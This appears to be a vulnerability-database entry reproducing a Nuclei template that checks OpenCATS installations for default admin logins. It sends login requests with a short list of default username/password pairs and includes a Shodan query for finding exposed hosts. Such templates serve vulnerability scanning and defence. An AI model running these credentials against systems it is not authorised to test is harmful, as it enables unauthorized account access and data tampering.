漏洞描述
OpenCATS contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
opencats-default-login: OpenCATS - Default Login
PoC代码[已公开]
id: opencats-default-login
info:
name: OpenCATS - Default Login
author: arafatansari
severity: high
description: OpenCATS contains a default admin login vulnerability. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
cvss-score: 8.3
cwe-id: CWE-522
cpe: cpe:2.3:a:opencats:opencats:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 4
shodan-query: title:"opencats"
product: opencats
vendor: opencats
tags: default-login,opencats,vuln
http:
- raw:
- |
POST /index.php?m=login&a=attemptLogin HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin
- cats@rootadmin
- john@mycompany.net
- username
password:
- admin
- cats
- password
- john99
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
words:
- '<title>OpenCATS - Home</title>'
- 'CATS Administrator'
- 'Dashboard'
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502202dead00a383a833af1f294a3ffa0c0cd10a2cd9bf5bd08489e1551a5c9449e1a022100936a80d8f5cc7d254995850b3c6856cb51332765053aacdba7285ce702028b4e:922c64590222798bb761d5b6d8e72950